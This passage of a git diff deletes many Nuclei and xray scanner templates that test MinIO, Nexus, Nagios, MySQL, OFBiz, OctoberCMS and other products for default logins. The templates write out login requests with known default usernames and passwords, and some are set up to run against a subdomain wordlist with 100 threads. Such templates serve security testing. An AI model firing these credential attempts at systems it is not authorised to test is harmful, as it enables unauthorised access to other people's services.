- shodan-query: title:"MantisBT"
- tags: mantisbt,default-login
-
-http:
- - raw:
- - |
- POST /login.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- return=index.php&username={{user}}&password={{pass}}
-
- attack: pitchfork
- payloads:
- user:
- - administrator
- pass:
- - root
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - contains(tolower(header), 'mantis_secure_session')
- - contains(tolower(header), 'mantis_string_cookie')
- condition: and
-
- - type: status
- status:
- - 302
-
-# digest: 490a0046304402205e3ba9080530721f7904ce8e6d98318f860b18d800d06370ccfd841b5de6ee8402201f73aac2837cd43bb2116deeddecd4ec504277ed0698a77d7c40c2a67bcf78b7:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/micro-focus-ucmdb-default-credentials-8843.yaml b/tmp/default/micro-focus-ucmdb-default-credentials-8843.yaml
deleted file mode 100644
index b889736280..0000000000
--- a/tmp/default/micro-focus-ucmdb-default-credentials-8843.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: micro-focus-ucmdb-default-credentials
-info:
- name: Micro Focus UCMDB Default Credentials
- author: dwisiswant0
- severity: high
- tags: ucmdb,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
- Host: {{Subdomains}}
-
- customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "LWSSO_COOKIE_KEY"
- part: header
diff --git a/tmp/default/micro-focus-ucmdb-default-credentials.yaml b/tmp/default/micro-focus-ucmdb-default-credentials.yaml
deleted file mode 100644
index dbd578c4be..0000000000
--- a/tmp/default/micro-focus-ucmdb-default-credentials.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: micro-focus-ucmdb-default-credentials
-
-info:
- name: Micro Focus UCMDB Default Credentials
- author: dwisiswant0
- severity: high
- tags: ucmdb,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
- Host: {{Subdomains}}
-
- customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "LWSSO_COOKIE_KEY"
- part: header
diff --git a/tmp/default/minio-default-login.yaml b/tmp/default/minio-default-login.yaml
deleted file mode 100755
index 6f9c037901..0000000000
--- a/tmp/default/minio-default-login.yaml
+++ /dev/null
@@ -1,54 +0,0 @@
-id: minio-default-login
-info:
- name: Minio Default Login
- author:
- - l0ne1y
- tags:
- - default-login
- - minio
- description: |-
- MinIO 后台默认口令登录漏洞
- Minio MinIO是美国MinIO(Minio)公司的一款开源的对象存储服务器。该产品支持构建用于机器学习、分析和应用程序数据工作负载的基础架构。MinIO的后台存在默认账户minioadmin/minioadmin。
- reference:
- - https://docs.min.io/docs/minio-quickstart-guide.html#
- severity: medium
- classification:
- cwe-id:
- - cwe-522
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- remediation: |-
- 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。
- 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。
- 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。
- 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/)
- 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/)
-requests:
-- matchers:
- - type: word
- part: header
- words:
- - 'Content-Type: application/json'
- - type: word
- condition: and
- part: body
- words:
- - uiVersion
- - token
- - type: status
- status:
- - 200
- matchers-condition: and
- raw:
- - |
- POST /minio/webrpc HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/json
-
- {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"}
- attack: pitchfork
- payloads:
- password:
- - minioadmin
- username:
- - minioadmin
diff --git a/tmp/default/minio-default-password-8890.yaml b/tmp/default/minio-default-password-8890.yaml
deleted file mode 100644
index a8623bcab4..0000000000
--- a/tmp/default/minio-default-password-8890.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-minio-default-password
-manual: true
-transport: http
-rules:
- poc10:
- request:
- cache: true
- method: POST
- path: /minio/webrpc
- headers:
- Content-Type: application/json
- body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
- poc20:
- request:
- cache: true
- method: POST
- path: /minio/webrpc
- headers:
- Content-Type: application/json
- body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}'
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uiVersion") && response.body.bcontains(b"token")
-expression: poc10() || poc20()
-detail:
- author: harris2015
- links:
- - https://docs.min.io/cn/
diff --git a/tmp/default/minio-default-password.yaml b/tmp/default/minio-default-password.yaml
deleted file mode 100644
index 0bc7d476ef..0000000000
--- a/tmp/default/minio-default-password.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: minio-default-password
-
-info:
- name: Minio Default Password
- author: pikpikcu
- severity: high
- description: Minio default admin credentials were discovered.
- verified: true
- reference:
- - https://docs.min.io/cn/
-
-rules:
- r0:
- request:
- method: POST
- path: /minio/webrpc
- headers:
- Content-Type: application/json
- body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}'
- expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b'"result":') && response.body.bcontains(b'"token":') && response.body.bcontains(b'"jsonrpc":')
-expression: r0()
diff --git a/tmp/default/mofi4500-default-login.yaml b/tmp/default/mofi4500-default-login.yaml
deleted file mode 100644
index 941f8dd8c2..0000000000
--- a/tmp/default/mofi4500-default-login.yaml
+++ /dev/null
@@ -1,44 +0,0 @@
-id: mofi4500-default-login
-
-info:
- name: MOFI4500-4GXeLTE-V2 Default Login
- author: pikpikcu
- severity: high
- description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered.
- reference:
- - https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- tags: mofi,default-login
-
-http:
- - raw:
- - |
- POST /cgi-bin/luci/ HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- username=root&password=admin
-
- attack: pitchfork
- payloads:
- username:
- - root
- password:
- - admin
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "MOFI4500 - General - LuCI"
-
- - type: status
- status:
- - 200
-
-# digest: 4a0a004730450221008726cf781d1674be1c159a28603071594a707d4e26653bf33f1b8441e880a46d02201bc6916439a9e31a04aa38489ec04ccefe672ce97a200a537467da15937ca469:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/mofi4500-default-password.yaml b/tmp/default/mofi4500-default-password.yaml
deleted file mode 100644
index 8dfa42efe7..0000000000
--- a/tmp/default/mofi4500-default-password.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-id: mofi4500-default-password
-
-info:
- name: MOFI4500-4GXeLTE-V2 Default Login
- author: pikpikcu
- severity: critical
- verified: false
-
-rules:
- r0:
- request:
- method: POST
- path: /cgi-bin/luci/
- body: username=root&password=admin
- expression: response.status == 200 && response.body.bcontains(b'MOFI4500 - General - LuCI')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/mysql-default-login.yaml b/tmp/default/mysql-default-login.yaml
deleted file mode 100644
index 687207551e..0000000000
--- a/tmp/default/mysql-default-login.yaml
+++ /dev/null
@@ -1,52 +0,0 @@
-id: mysql-default-login
-
-info:
- name: MySQL - Default Login
- author: DhiyaneshDk,pussycat0x,ritikchaddha
- severity: high
- description: |
- A MySQL service was accessed with easily guessed credentials.
- metadata:
- verified: true
- max-request: 21
- shodan-query: "port:3306"
- tags: js,mysql,default-login,network,fuzz
-
-javascript:
- - pre-condition: |
- var m = require("nuclei/mysql");
- var c = m.MySQLClient();
- c.IsMySQL(Host, Port);
-
- code: |
- var m = require("nuclei/mysql");
- var c = m.MySQLClient();
- c.Connect(Host,Port,Username,Password)
-
- args:
- Host: "{{Host}}"
- Port: "3306"
- User: "{{usernames}}"
- Pass: "{{passwords}}"
-
- payloads:
- usernames:
- - root
- - admin
- - mysql
- - test
- passwords:
- - root
- - admin
- - mysql
- - test
- -
- attack: clusterbomb
-
- matchers:
- - type: dsl
- dsl:
- - "response == true"
- - "success == true"
- condition: and
-# digest: 4a0a004730450220733725a3093b270900d6688f205629ca6477122f4f7d69f53792848fee2c5b56022100e1bc0a82d4775f448f3ba233a51ec6c9d5730b3336a0bd4add33052537f6a8a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/default/nacos-default-password.yaml b/tmp/default/nacos-default-password.yaml
deleted file mode 100644
index 93f807ea49..0000000000
--- a/tmp/default/nacos-default-password.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: nacos-default-password
-
-info:
- name: Nacos Default Password
- author: zan8in
- severity: high
- verified: true
-
-rules:
- r0:
- request:
- method: POST
- path: /v1/auth/users/login
- body: username=nacos&password=nacos
- expression: response.status == 200 && response.body.bcontains(b'"username":') && response.body.bcontains(b'"nacos"')
- r1:
- request:
- method: POST
- path: /nacos/v1/auth/users/login
- body: username=nacos&password=nacos
- expression: response.status == 200 && response.body.bcontains(b'"username":') && response.body.bcontains(b'"nacos"')
-expression: r0() || r1()
\ No newline at end of file
diff --git a/tmp/default/nagios-default-credential-8989.yaml b/tmp/default/nagios-default-credential-8989.yaml
deleted file mode 100644
index 730356abdb..0000000000
--- a/tmp/default/nagios-default-credential-8989.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: nagios-default-credentials
-info:
- name: Nagios Default Credentials Check
- author: iamthefrogy
- severity: high
- tags: nagios,default-login
- reference: https://www.nagios.org
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /nagios/side.php HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'Current Status'
- - 'Reports'
- condition: and
diff --git a/tmp/default/nagios-default-credential.yaml b/tmp/default/nagios-default-credential.yaml
deleted file mode 100644
index 90a2a98920..0000000000
--- a/tmp/default/nagios-default-credential.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: nagios-default-credentials
-info:
- name: Nagios Default Credentials Check
- author: iamthefrogy
- severity: high
- tags: nagios,default-login
- reference: https://www.nagios.org
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /nagios/side.php HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'Current Status'
- - 'Reports'
- condition: and
diff --git a/tmp/default/nagios-default-login-8992.yaml b/tmp/default/nagios-default-login-8992.yaml
deleted file mode 100644
index 5383b95f8b..0000000000
--- a/tmp/default/nagios-default-login-8992.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: nagios-default-login
-info:
- name: Nagios Default Login
- author: iamthefrogy
- severity: high
- tags: nagios,default-login
- reference: https://www.nagios.org
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- GET /nagios/side.php HTTP/1.1
- Host: {{Subdomains}}
- Accept-Encoding: gzip, deflate
- Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'Current Status'
- - 'Reports'
- condition: and
diff --git a/tmp/default/nagios-default-login.yaml b/tmp/default/nagios-default-login.yaml
deleted file mode 100644
index aad8d95713..0000000000
--- a/tmp/default/nagios-default-login.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: nagios-default-login
-info:
- name: Nagios Default Login
- author: iamthefrogy
- severity: high
- tags: nagios,default-login
- reference: https://www.nagios.org
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /nagios/side.php HTTP/1.1
- Host: {{Subdomains}}
- Accept-Encoding: gzip, deflate
- Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4=
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - 'Current Status'
- - 'Reports'
- condition: and
diff --git a/tmp/default/netentsec-icg-default-password.yaml b/tmp/default/netentsec-icg-default-password.yaml
deleted file mode 100644
index b28a54bab6..0000000000
--- a/tmp/default/netentsec-icg-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: netentsec-icg-default-password
-
-info:
- name: netentsec icg 默认密码
- author: B1anda0(https://github.com/B1anda0)
- severity: critical
- description: netentsec icg 默认密码
- reference:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
-
-rules:
- r0:
- request:
- method: POST
- path: /user/login/checkPermit
- body: usrname=ns25000&pass=ns25000
- expression: response.status == 200 && response.body.bcontains(b"\"agreed\":true")
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/netentsec-icg-default-password.yml b/tmp/default/netentsec-icg-default-password.yml
deleted file mode 100644
index 805f2163cd..0000000000
--- a/tmp/default/netentsec-icg-default-password.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-netentsec-icg-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /user/login/checkPermit
- body: usrname=ns25000&pass=ns25000
- expression: response.status == 200 && response.body.bcontains(b"\"agreed\":true")
-expression: r0()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
diff --git a/tmp/default/netsus-default-login.yaml b/tmp/default/netsus-default-login.yaml
deleted file mode 100644
index d2d6a86e19..0000000000
--- a/tmp/default/netsus-default-login.yaml
+++ /dev/null
@@ -1,46 +0,0 @@
-id: netsus-default-login
-
-info:
- name: NetSUS Server Default Login
- author: princechaddha
- severity: high
- description: NetSUS Server default admin credentials were discovered.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- shodan-query: http.title:"NetSUS Server Login"
- tags: netsus,default-login
-
-http:
- - raw:
- - |
- POST /webadmin/index.php HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- loginwith=suslogin&username={{username}}&password={{password}}&submit=
-
- attack: pitchfork
- payloads:
- username:
- - webadmin
- password:
- - webadmin
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - 'Location: dashboard.php'
- - 'PHPSESSID='
- condition: and
-
- - type: status
- status:
- - 302
-
-# digest: 4b0a00483046022100f81ef0749fcb57b49a9eee5f0d9ef75806c3f56c5940782b6063ac5c689bab70022100f300142aa6fdcb0f7e9562484cd14eb4ebb8d0efb0597c63a69b6407f6eed8b2:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/nexus-default-login-9087.yaml b/tmp/default/nexus-default-login-9087.yaml
deleted file mode 100644
index 733a0af154..0000000000
--- a/tmp/default/nexus-default-login-9087.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: nexus-default-login
-info:
- name: Nexus Default Login
- author: pikpikcu
- severity: high
- tags: nexus,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /service/rapture/session HTTP/1.1
- Host: {{Subdomains}}
- X-Nexus-UI: true
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 204
- - type: word
- words:
- - "Server: Nexus"
- - "NXSESSIONID"
- part: header
- condition: and
diff --git a/tmp/default/nexus-default-login.yaml b/tmp/default/nexus-default-login.yaml
deleted file mode 100644
index fd3655a0e7..0000000000
--- a/tmp/default/nexus-default-login.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: nexus-default-login
-
-info:
- name: Nexus Default Login
- author: pikpikcu
- severity: high
- tags: nexus,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /service/rapture/session HTTP/1.1
- Host: {{Subdomains}}
- X-Nexus-UI: true
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 204
- - type: word
- words:
- - "Server: Nexus"
- - "NXSESSIONID"
- part: header
- condition: and
diff --git a/tmp/default/nexus-default-password-9090.yaml b/tmp/default/nexus-default-password-9090.yaml
deleted file mode 100644
index 88e710790c..0000000000
--- a/tmp/default/nexus-default-password-9090.yaml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-nexus-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /service/local/authentication/login
- headers:
- Accept: application/json
- Authorization: Basic YWRtaW46YWRtaW4xMjM=
- follow_redirects: false
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"loggedIn")
-expression: r0()
-detail:
- author: Soveless(https://github.com/Soveless)
- links:
- - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager
- Affected Version: Nexus Repository Manager OSS
diff --git a/tmp/default/nexus-default-password.yaml b/tmp/default/nexus-default-password.yaml
deleted file mode 100644
index 9b394b5076..0000000000
--- a/tmp/default/nexus-default-password.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: nexus-default-password
-
-info:
- name: Nexus Default Password
- author: pikpikcu
- severity: high
- tags: nexus,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /service/rapture/session HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 43
- X-Nexus-UI: true
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 204
- - type: word
- words:
- - "Server: Nexus"
- - "NXSESSIONID"
- part: header
- condition: and
diff --git a/tmp/default/nps-default-login-9143.yaml b/tmp/default/nps-default-login-9143.yaml
deleted file mode 100644
index fd10d21d4b..0000000000
--- a/tmp/default/nps-default-login-9143.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: nps-default-login
-info:
- name: NPS Default Login
- author: pikpikcu
- severity: high
- tags: nps,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login/verify HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{Scheme}}://{{Subdomains}}/login/index
-
- username=admin&password=123
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- condition: and
- - type: word
- words:
- - '"msg": "login success"'
- - '"status": 1'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/nps-default-login.yaml b/tmp/default/nps-default-login.yaml
deleted file mode 100644
index fdd7e4bc24..0000000000
--- a/tmp/default/nps-default-login.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: nps-default-login
-
-info:
- name: NPS Default Login
- author: pikpikcu
- severity: high
- tags: nps,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/verify HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
- Referer: {{Scheme}}://{{Subdomains}}/login/index
-
- username=admin&password=123
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- condition: and
- - type: word
- words:
- - '"msg": "login success"'
- - '"status": 1'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/nps-default-password-9146.yaml b/tmp/default/nps-default-password-9146.yaml
deleted file mode 100644
index 5c353a9cf1..0000000000
--- a/tmp/default/nps-default-password-9146.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-nps-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: POST
- path: /login/verify
- body: username=admin&password=123
- follow_redirects: true
- expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"login success")
-expression: r0()
-detail: {}
diff --git a/tmp/default/nps-default-password.yaml b/tmp/default/nps-default-password.yaml
deleted file mode 100644
index 379a475af8..0000000000
--- a/tmp/default/nps-default-password.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: nps-default-password
-
-info:
- name: NPS Default Password
- author: pikpikcu
- severity: high
- tags: nps,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/verify HTTP/1.1
- Host: {{Subdomains}}
- Referer: https://{{Subdomains}}/login/index
- Content-Type: application/x-www-form-urlencoded
-
- username=admin&password=123
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "application/json"
- part: header
- condition: and
- - type: word
- words:
- - '"msg": "login success"'
- - '"status": 1'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/ns-icg-default-password.yaml b/tmp/default/ns-icg-default-password.yaml
deleted file mode 100644
index 51ae1d8818..0000000000
--- a/tmp/default/ns-icg-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: ns-icg-default-password
-
-info:
- name: NS-ICG Default Password
- author: pikpikcu
- severity: high
- verified: true
- description: fofa "NS-ICG"
-
-rules:
- r0:
- request:
- method: POST
- path: /user/login/checkPermit
- body: usrname=ns25000&pass=ns25000
- expression: response.status == 200 && response.body.bcontains(b'{"agreed":true}')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/o2-default-password.yaml b/tmp/default/o2-default-password.yaml
deleted file mode 100644
index 3673bf9f19..0000000000
--- a/tmp/default/o2-default-password.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: o2-default-password
-
-info:
- name: O2OA 后台默认密码
- author: zan8in
- severity: high
- description: |
- O2OA是一款开源免费的企业及团队办公平台,提供门户管理、流程管理、信息管理、数据管理四大平台,集工作汇报、项目协作、移动OA、文档分享、流程审批、数据协作等众多功能,满足企业各类管理和协作需求。
- title=="O2OA"
-
-rules:
- r0:
- request:
- method: POST
- path: /x_organization_assemble_authentication/jaxrs/authentication/captcha?v=7.1&l7u46why
- headers:
- Authorization: anonymous
- Content-Type: application/json; charset=UTF-8
- body: |
- {"credential":"xadmin","password":"o2"}
- expression: response.status == 200 && response.body.bcontains(b'"type":') && response.body.bcontains(b'"success"')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/octobercms-default-login.yaml b/tmp/default/octobercms-default-login.yaml
deleted file mode 100644
index 480d0eb092..0000000000
--- a/tmp/default/octobercms-default-login.yaml
+++ /dev/null
@@ -1,65 +0,0 @@
-id: octobercms-default-login
-
-info:
- name: OctoberCMS - Default Admin Discovery
- author: princechaddha
- severity: high
- description: OctoberCMS default admin credentials were discovered.
- reference:
- - https://github.com/octobercms/october
- - https://octobercms.com/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- verified: true
- max-request: 4
- shodan-query: http.component:"October CMS"
- tags: octobercms,default-login,oss
-
-http:
- - raw:
- - |
- GET /backend/backend/auth/signin HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- - |
- POST /backend/backend/auth/signin HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- Content-Type: application/x-www-form-urlencoded
-
- _token={{token}}&postback=1&login={{username}}&password={{password}}
-
- attack: clusterbomb
- payloads:
- username:
- - admin
- password:
- - admin
- - ""
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "october_session="
- - "admin_auth="
- condition: and
-
- - type: status
- status:
- - 302
-
- extractors:
- - type: regex
- part: body
- name: token
- internal: true
- group: 1
- regex:
- - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">'
-
-# digest: 4b0a004830460221008c9a98bee55491e7fe022bdcc030f081bf74c377b2de0061057ad20cadcb33a2022100e8ea2fb0bdee7e31aa27be618dcf8e91cfd91ae54928b37de4c70b77c43ffa89:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/ofbiz-default-credentials-9207.yaml b/tmp/default/ofbiz-default-credentials-9207.yaml
deleted file mode 100644
index 28e037f615..0000000000
--- a/tmp/default/ofbiz-default-credentials-9207.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: ofbiz-default-credentials
-info:
- name: Apache OfBiz Default Credentials
- author: pdteam
- severity: medium
- tags: ofbiz,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /control/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
- matchers:
- - type: word
- words:
- - "ofbiz-pagination-template"
- - "Powered by OFBiz"
- condition: and
diff --git a/tmp/default/ofbiz-default-credentials.yaml b/tmp/default/ofbiz-default-credentials.yaml
deleted file mode 100644
index c2d98a34bd..0000000000
--- a/tmp/default/ofbiz-default-credentials.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: ofbiz-default-credentials
-
-info:
- name: Apache OfBiz Default Credentials
- author: pdteam
- severity: medium
- tags: ofbiz,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /control/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
- matchers:
- - type: word
- words:
- - "ofbiz-pagination-template"
- - "Powered by OFBiz"
- condition: and
\ No newline at end of file
diff --git a/tmp/default/ofbiz-default-login-9209.yaml b/tmp/default/ofbiz-default-login-9209.yaml
deleted file mode 100644
index ff04f82d4c..0000000000
--- a/tmp/default/ofbiz-default-login-9209.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: ofbiz-default-login
-info:
- name: Apache OfBiz Default Login
- author: pdteam
- severity: medium
- tags: ofbiz,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /control/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "ofbiz-pagination-template"
- - "Powered by OFBiz"
- condition: and
diff --git a/tmp/default/ofbiz-default-login.yaml b/tmp/default/ofbiz-default-login.yaml
deleted file mode 100644
index 3124ced91b..0000000000
--- a/tmp/default/ofbiz-default-login.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: ofbiz-default-login
-
-info:
- name: Apache OfBiz Default Login
- author: pdteam
- severity: medium
- tags: ofbiz,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /control/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "ofbiz-pagination-template"
- - "Powered by OFBiz"
- condition: and
\ No newline at end of file
diff --git a/tmp/default/ofbiz-default-password.yaml b/tmp/default/ofbiz-default-password.yaml
deleted file mode 100644
index 3c4092e71b..0000000000
--- a/tmp/default/ofbiz-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: ofbiz-default-password
-
-info:
- name: Apache OfBiz Default Login
